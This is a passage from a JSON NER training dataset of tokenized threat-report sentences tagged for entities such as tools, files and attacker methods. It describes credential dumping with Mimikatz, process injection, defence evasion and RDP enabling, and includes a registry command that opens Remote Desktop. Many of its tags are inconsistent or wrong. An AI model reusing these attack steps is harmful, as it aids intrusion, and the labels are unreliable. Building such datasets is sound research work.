"O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "after", "completing", "RDP", "connections", "to", "various", "hosts", "on", "the", "network" ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "which", "were", "started", "via", "their", "interactive", "RDP", "session" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "RDP", "was", "also", "used", "by", "the", "threat", "actor" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg" ] }, { "tokens": [ "The", "threat", "actor", "was", "able", "to", "RDP", "to", "a", "backup", "server" ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "running", "processes", "were", "reviewed" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actors", "checked", "running", "processes", "on", "the", "accessed", "hosts", "via", "taskmanager" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "checking", "on", "running", "tasks," ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "the", "new", "drive", "contained", "a", "LNK", "file", "6570872.lnk", "and", "hidden", "folder", "“me”." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "B-Way" ] }, { "tokens": [ "The", "contents", "of", "hidden", "folder", "“me”,", "included", "several", "files", "and", "folders", "that", "were", "used", "for", "the", "execution" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "folder", "included", "a", "legitimate", "copy", "of", "rundll32.exe" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "rundll32.exe", "binary", "downloaded", "approximately", "0.4", "MB", "of", "data." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "using", "a", "renamed", "copy", "of", "rundll32." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Batch", "script", "to", "run" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "file", "would", "execute", "a", "batch", "script" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "C:\\Windows\\syswow64\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "An", "instance", "of", "cmd.exe", "was", "launched", "through", "explorer.exe", "which", "ran", "the", "following", "command" ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "cmd.exe", "session" ], "ner_tags": [ "B-SamFile", "O" ] }, { "tokens": [ "The", "threat", "actor", "also", "used", "a", "batch", "script", "to", "collect", "a", "list", "of", "all", "computer", "objects", "on", "the", "domain", "using", "C:\\Windows\\system32\\cmd.exe", "/C", "adcomp.bat", "which", "contained", "the", "PowerShell", "command:" ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "O", "O", "I-Tool", "I-Tool", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Once", "the", "user", "had", "mounted", "the", "ISO", "and", "the", "LNK", "file", "was", "executed", "by", "the", "user,", "the", "complex", "execution", "flow", "started." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "names", "of", "the", "registry", "values", "changed" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "last", "registry", "key", "was", "used", "to", "store", "additional", "PowerShell", "code." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "This", "script", "called", "a", "combination", "of", "QueueUserAPC,", "GetCurrentThreadId,", "OpenThread,", "and", "VirtualAlloc" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "the", "threat", "actor", "injected", "into", "various", "processes" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "reg.exe", "query" ], "ner_tags": [ "B-SamFile", "O" ] }, { "tokens": [ "started", "a", "BITS", "job", "to", "download", "a", "Cobalt", "Strike", "beacon" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool" ] }, { "tokens": [ "whoami" ], "ner_tags": [ "O" ] }, { "tokens": [ "whoami", "/groups" ], "ner_tags": [ "B-Idus", "O" ] }, { "tokens": [ "ipconfig", "/all" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "threat", "actor", "first", "ran", "some", "initial", "discovery", "on", "the", "host", "using", "built-in", "Windows", "utilities", "like", "ipconfig" ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "systeminfo" ], "ner_tags": [ "O" ] }, { "tokens": [ "systeminfo" ], "ner_tags": [ "O" ] }, { "tokens": [ "WMI", "was", "used", "to", "pivot", "to", "a", "domain", "controller", "on", "the", "network." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "The", "actor", "leveraged", "Impacket’s", "wmiexec.py", "to", "execute", "commands", "with", "a", "semi-interactive", "shell" ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "interacts", "with", "remote", "endpoints", "via", "WMI" ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "a", "number", "of", "WMI", "requests", "via", "DCERPC", "from", "one", "endpoint", "to", "a", "target", "endpoint", "based", "on", "the", "ports." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "‘Powershell.exe’", "process", "initiated", "the", "WMI", "requests." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "One", "of", "the", "observed", "commands", "invoked", "via", "WMI", "was", "‘firefox.exe’." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-SamFile" ] }, { "tokens": [ "The", "commands", "executed", "included", "directory", "traversal," ], "ner_tags": [ "O", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Tool", "Used", "to", "Steal", "Sensitive", "Information" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "proxying", "the", "traffic" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "initiating", "a", "proxied" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Several", "HTTP", "Post", "events", "were", "observed", "to", "the", "identified", "domains" ], "ner_tags": [ "O", "B-Org", "I-Org", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HTTP", "stream", "containing", "the", "content" ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "The", "POST", "event", "included", "a", "MIME", "part", "indicating", "file", "upload" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "The", "file", "that", "was", "uploaded", "775E.bin", "was", "deleted", "by", "the", "injected", "‘Explorer.exe’", "process", "from", "the", "target", "endpoint" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actor", "was", "able", "to", "RDP", "to", "a", "backup", "server", "using", "the", "admin", "credentials", "they", "acquired." ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "script", "called", "a", "combination", "of", "QueueUserAPC,", "GetCurrentThreadId,", "OpenThread,", "and", "VirtualAlloc", "to", "perform", "process", "injection", "of", "shellcode" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O", "B-Way", "O", "O", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "shellcode", "stored", "in", "Base64." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "mounted", "file", "contains", "a", "hidden", "folder" ], "ner_tags": [ "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "a", "200+MB", "padded", "file" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "padding", "the", "contents", "with", "benign", "data" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "It", "included", "a", "standalone", "file", "padded", "with", "over", "200MB", "of", "blank", "spaces,", "likely", "to", "impede", "analysis", "of", "the", "decompressed", "ISO", "file." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "executes", "a", "CMD", "file" ], "ner_tags": [ "O", "O", "B-HackOrg", "O" ] }, { "tokens": [ "The", "CMD", "file", "contains", "commands" ], "ner_tags": [ "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "which", "use", "certutil", "(renamed", "here", "as", "slaughterhouse.exe)", "to", "decode" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "The", "decoded", "DLL" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "thus", "requires", "two", "rounds", "of", "decoding", "using", "certutil." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "chaining", "together", "a", "series", "of", "scripts", "to", "decode" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "victim", "double", "clicks", "the", "ISO", "to", "mount", "it" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Victims", "can", "be", "lured", "into", "clicking", "executable", "content", "including", "binaries,", "scripts", "or", "shortcut", "files", "masquerading", "as", "benign", "filetypes", "such", "as", "PDFs", "or", "folders." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "DLL", "is", "then", "executed", "using", "rundll32" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "and", "injects", "Qakbot", "into", "wermgr.exe." ], "ner_tags": [ "O", "O", "B-Idus", "O", "B-SamFile" ] }, { "tokens": [ "This", "file", "is", "base64", "twice," ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "or", "unpack", "the", "final", "payload" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "modifies", "registry", "keys", "to", "maintain", "persistence," ], "ner_tags": [ "B-Way", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Modifies", "the", "Windows", "registry" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "modifies", "the", "Windows", "Registry", "to", "allow", "remote", "desktop", "connections" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "establishes", "persistence", "through", "the", "creation", "of", "two", "keys", "in", "CurrentVersion\\Run." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Creates", "registry", "key", "for", "persistence", "only" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Creates", "two", "registry", "keys", "for", "persistence" ], "ner_tags": [ "O", "O", "B-Tool", "B-Features", "O", "O" ] }, { "tokens": [ "Keys", "found", "in", "CurrentVersion\\Run", "contain", "references", "to", "programs", "that", "will", "execute", "when", "a", "user", "logs", "in." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "operators", "install", "and", "execute", "remote", "access", "tools", "such", "as", "Splashtop", "on", "targeted", "systems." ], "ner_tags": [ "O", "B-Features", "O", "O", "I-Features", "I-Features", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "remote", "monitoring", "and", "management", "(RMM)", "software" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "operators", "use", "Splashtop", "to", "transfer", "malicious", "tools", "from", "computer", "to", "computer", "in", "the", "victim’s", "environment." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "It", "copies", "other", "malicious", "batch", "and", "EXE", "files", "from", "a", "compromised", "internal", "Server", "Message", "Block", "(SMB)", "server", "to", "the", "newly", "created", "temp", "folder" ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "operators", "utilize", "RDP", "to", "move", "laterally", "in", "the", "victim’s", "environment." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Modifies", "the", "Windows", "registry", "to", "allow", "remote", "desktop", "connections." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "operators", "open", "up", "an", "Remote", "Desktop", "Protocol", "(RDP)", "port" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "B-Way", "O" ] }, { "tokens": [ "operators", "use", "Mimikatz", "to", "dump", "passwords." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "operators", "use", "Mimikatz", "to", "dump", "passwords", "from", "LSASS." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mimikatz,", "which", "is", "a", "tool", "used", "for", "extracting", "sensitive", "information", "such", "as", "passwords", "and", "authentication", "credentials", "from", "a", "Windows", "operating", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mimikatz", "being", "leveraged", "maliciously", "by", "threat", "actors", "in", "the", "following", "ways:", "Credential", "Loading", "Mimikatz", "loads", "credentials", "from", "various", "sources", "such", "as", "Windows", "memory,", "Local", "Security", "Authority", "Subsystem", "Service", "(LSASS)", "process" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "B-Way", "O", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mimikatz", "allows", "the", "user", "to", "manipulate", "the", "dumped", "credentials," ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "is", "a", "small,", "UPX-packed", "password", "protected", "binary" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "version", "of", "Mimikatz", "has", "been", "compressed", "using", "UPX" ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "While", "UPX", "is", "often", "legitimately", "used", "to", "reduce", "file", "size,", "we", "have", "observed", "threat", "actors", "utilizing", "UPX", "and", "other", "packing", "programs", "to", "evade", "static", "detection", "of", "the", "underlying", "payload." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "operators", "use", "UPX", "to", "pack", "DC2.exe", "and", "DC4.exe", "to", "avoid", "static", "signature", "detection." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "batch", "file", "makes", "the", "following", "changes", "to", "the", "system" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "executes", "an", "embedded", "batch", "file." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "is", "a", "batch", "script" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "is", "a", "batch", "script", "that", "creates", "a", "new", "user" ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "creates", "a", "batch", "script", "that," ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "creates", "a", "batch", "script" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Disables", "the", "User", "Account", "Control", "(UAC)" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Attempting", "to", "use", "sc", "stop", "and", "taskkill", "to", "stop", "over", "100", "services", "related", "to", "various", "areas", "ranging", "from", "remote", "desktop", "tools", "to", "Windows", "Defender" ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org" ] }, { "tokens": [ "The", "HTML", "code", "in", "this", "file", "contains", "embedded", "JavaScript", "functionality," ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "B-Tool", "O" ] }, { "tokens": [ "cleanup", "script", "used", "to", "remove", "evidence", "of", "the", "attack", "on", "a", "system" ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "I-Features", "I-Features", "O", "O", "B-OffAct", "O", "O", "O" ] }, { "tokens": [ "cleanup", "scripts", "from", "other", "threat", "actors", "are", "usually", "smaller", "and", "more", "specific", "to", "the", "tools", "used", "by", "that", "actor." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg" ] }, { "tokens": [ "adds", "an", "additional", "layer", "of", "obfuscation", "to", "the", "code" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "password-protected", "executables", "to", "obfuscate", "malware" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "operators", "used", "Splashtop", "–", "a", "remote", "access", "and", "management", "(RMM)", "tool", "–", "to", "transfer", "the", "following", "malware", "into", "the", "target’s", "environment." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "operators", "use", "Splashtop", "to", "move", "laterally", "and", "transfer", "malware", "between", "compromised", "hosts", "in", "the", "victim’s", "environment." ], "ner_tags": [ "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "B-Purp", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "utilize", "Splashtop", "to", "transfer", "netscan.exe,", "netscan.lic,", "netscan.xml,", "newuser.bat,", "start.bat", "and", "turnoff.bat." ], "ner_tags": [ "O", "B-Way", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "operators", "delete", "files", "such", "as", "mim.exe,", "mim32.exe,", "zam.exe", "and", "zam.bat", "to", "cover", "their", "tracks" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "hid", "the", "installer", "for", "Advanced", "Port", "Scanner", "within", "Inno", "Setup", "installer", "to", "evade", "static", "signature", "detection." ], "ner_tags": [ "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "B-SamFile", "O", "I-Purp", "O" ] }, { "tokens": [ "employing", "a", "combination", "of", "outdated", "Microsoft", "Office", "document", "vulnerabilities" ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Exp", "I-Exp", "I-Exp", "I-Exp" ] }, { "tokens": [ "exploit", "vulnerabilities", "in", "Microsoft", "Word’s", "Equation", "Editor" ], "ner_tags": [ "I-Exp", "I-Exp", "O", "O", "O", "O", "O" ] }, { "tokens": [ "leverages", "a", "specific", "set", "of", "vulnerabilities,", "including", "CVE-2018-0802,", "CVE-2018-0798,", "and", "CVE-2017-11882,", "within", "the", "Equation", "Editor", "of", "Microsoft", "Office" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "employs", "a", "forged", "document", "linked", "to", "G7", "to", "target", "various", "governments", "within", "the", "G20", "forum." ], "ner_tags": [ "O", "O", "I-Way", "I-Way", "O", "O", "B-Idus", "O", "O", "O", "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "spam", "email", "comprising", "an", "attached", "MS", "Office", "document" ], "ner_tags": [ "B-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "employ", "the", "remote", "template", "injection", "method", "to", "retrieve", "the", "next", "stage", "of", "the", "malware", "from", "the", "TA’s", "Command-and-Control", "(C&C)", "server." ], "ner_tags": [ "O", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "download", "of", "a", "new", "payload", "from", "the", "attacker’s", "remote", "server" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O" ] }, { "tokens": [ "download", "a", "backdoor", "module." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "downloads", "and", "executes", "a", "malicious", "backdoor" ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "enables", "the", "TAs", "to", "create", "customized", "documents", "containing", "embedded", "objects", "that", "exploit", "vulnerabilities", "in", "Microsoft", "Word’s", "Equation", "Editor" ], "ner_tags": [ "O", "O", "O", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "drops", "an", "embedded", "payload,", "which", "is", "a", "DLL", "file" ], "ner_tags": [ "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "includes", "both", "an", "encrypted", "payload", "and", "shellcode" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "encrypts", "the", "collected", "information", "using", "RC4", "encryption", "with", "the", "key", "“xkYgv127”", "and", "encodes", "it", "using", "base64." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "proceeds", "to", "decrypt" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "scheduled", "task", "entry," ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "executes", "the", "export", "function", "“StartA”", "from", "the", "DLL" ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "using", "rundll32.exe" ], "ner_tags": [ "O", "B-SamFile" ] }, { "tokens": [ "utilizing", "the", "“rundll32.exe”", "command" ], "ner_tags": [ "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "loader", "is", "executed", "through", "rundll32.exe" ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "hostname,", "operating", "system", "name,", "OS", "version,", "username," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gather", "computer-specific", "information", "such", "as", "computer", "name,", "username,", "gateway", "address,", "network", "adapter", "details,", "Windows", "version,", "and", "user", "type" ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Internet", "information," ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Retrieve", "TCP/UDP", "tables" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "presence", "of", "any", "installed", "anti-virus", "software", "on", "the", "machine." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "encrypted", "data", "is", "then", "exfiltrated", "using", "the", "below", "C&C", "URL" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "encrypted", "data", "is", "then", "exfiltrated", "using", "the", "below", "C&C", "URL" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "C&C", "server", "responds", "with", "the", "next", "stage", "executable" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "loader", "establishes", "a", "connection", "with", "a", "C&C", "server", "in", "the", "final", "stage", "of", "the", "attack." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Capture", "screenshots", "of", "victims’", "system" ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Obtain", "information", "about", "processes", "and", "services", "running", "on", "the", "machine" ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Retrieve", "information", "about", "registry", "keys" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "using", "the", "remote", "process", "execution", "tool", "PSExec", "to", "execute", "batch", "files" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Copy", "down", "batch", "scriptsExecute", "batch", "scripts" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "defaultChanges", "the", "Windows", "Shell", "from", "Explorer", "to", "their", "malicious", "script" ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "exe└──cmd.exe:", "C:\\Windows\\system32\\cmd.exe", "/c", "\"\"rdp.bat\"" ], "ner_tags": [ "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "executes", "the", "shell", "(file2.bat)," ], "ner_tags": [ "B-Features", "O", "O", "O" ] }, { "tokens": [ "tries", "to", "start", "its", "defined", "shell", "which", "has", "been", "swapped", "to", "a", "batch", "script", "(file2.bat)", "by", "the", "malicious", "actor." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Command", "line", "flags", "may", "be", "used", "to", "change", "this", "behavior", "and", "invoke", "one", "or", "more", "of", "the", "modules." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "I-Features", "I-Features", "O", "B-Features" ] }, { "tokens": [ "that", "would", "cause", "registry", "changes" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "reg.exe:", "reg", "add", "\"HKLM\\System\\CurrentControlSet\\Control\\Terminal", "Server\"", "/v", "\"fDenyTSConnections\"", "/t", "REG_DWORD", "/d", "0", "/" ], "ner_tags": [ "B-SamFile", "B-SamFile", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O" ] }, { "tokens": [ "Sets", "various", "registry", "values" ], "ner_tags": [ "B-Features", "I-Features", "I-Features", "I-Features" ] }, { "tokens": [ "to", "enable", "Remote", "Desktop", "sessions", "(RDP)", "using", "reg.exe." ], "ner_tags": [ "O", "O", "B-Way", "I-Tool", "I-Tool", "B-Way", "O", "B-Way" ] }, { "tokens": [ "the", "malicious", "actor", "retrieved", "system", "administration", "tools", "and", "malicious", "payloads", "by", "using", "the", "Background", "Intelligent", "Transfer", "Service" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Storing", "the", "ransomware", "within", "a", "7zip", "encrypted", "archive" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "encrypted", "archive", "containing", "the", "ransomware," ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "a", "decompression", "utility", "to", "extract", "the", "ransomware" ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Purp", "I-Purp" ] }, { "tokens": [ "drop", "the", "defenses", "of", "the", "victim,", "inhibit", "monitoring,", "disable", "networking" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "stops", "specific", "defensive", "services", "(Windows", "Defender,", "etc)" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Purp", "O" ] }, { "tokens": [ "Will", "also", "skip", "enumeration", "and", "stopping", "of", "antivirus", "software.-" ], "ner_tags": [ "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { 